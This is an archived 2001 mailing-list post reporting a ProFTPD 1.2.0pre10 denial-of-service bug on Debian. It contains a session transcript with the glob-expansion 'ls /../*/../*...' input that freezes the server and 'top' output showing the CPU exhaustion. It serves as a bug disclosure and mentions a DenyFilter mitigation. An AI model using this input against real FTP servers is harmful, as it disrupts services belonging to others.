Michael Bellears <michael.bellearsat_private> wrote: : Couldn't reproduce on Debian 2.2.... : isp-server-03:/# proftpd -v : - ProFTPD Version 1.2.0pre10 Debian 2.2 and the same version of ProftpD here. According to dpkg: dpkg -s proftpd | grep ^Version Version: 1.2.0pre10-2.0potato1 The client side of the ftp session, that initiates the problem: ------------------------------------------------------------------------------ Script started on Mon Aug 20 18:15:49 2001 $ ftp ftp.mydomain.com Connected to web.mydomain.com. 220 ProFTPD 1.2.0pre10 Server (mydomain.com FTP) [web.mydomain.com] Name (ftp.mydomain.com:mfaurot): 331 Password required for mfaurot. Password: 230 User mfaurot logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* 200 PORT command successful. 150 Opening ASCII mode data connection for file list. Quit $ exit Script done on Mon Aug 20 18:18:22 2001 ------------------------------------------------------------------------------ After issuing the "ls" command the server seems to freeze after displaying "150 Opening ASCII mode data connection for file list." It then becomes necessary to issue a Ctrl-\ to exit the ftp client. Now, on the server hosting Proftpd, here's the relevant bit from "top" showing the proftpd process sucking all the available CPU and a lot of the RAM: ------------------------------------------------------------------------------ 6:18pm up 5 days, 3:02, 2 users, load average: 0.28, 0.06, 0.02 45 processes: 42 sleeping, 3 running, 0 zombie, 0 stopped CPU states: 0.6% user, 0.1% system, 0.2% nice, 1.9% idle Mem: 255984K av, 184876K used, 71108K free, 0K shrd, 2464K buff Swap: 248968K av, 26260K used, 222708K free 19400K cached PID USER PRI NI SIZE RSS SHARE STAT LIB %CPU %MEM TIME COMMAND 27556 mfaurot 20 0 76884 75M 952 R 0 96.4 30.0 0:21 proftpd 27561 mfaurot 12 0 1476 1476 740 R 0 2.8 0.5 0:00 top 1 root 8 0 132 84 60 S 0 0.0 0.0 0:03 init 2 root 9 0 0 0 0 SW 0 0.0 0.0 0:00 keventd ------------------------------------------------------------------------------ NOTE: The configuration option "DenyFilter \*.*/" has not been applied to this system. While that might well resolve the issue for me, that's not going to fix the problem for the next person that is unaware of the bug. In discussing this situation with Robert van der Meulen, I note that this only happens when one logs in with a regular user id and password, but it doesn't happen when doing an anonymous login. -- ------------------------------------------------------------------------------ Michael | mfaurot | We're all just basically monkeys with car keys. Faurot | atww.org |
This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 21:10:34 PDT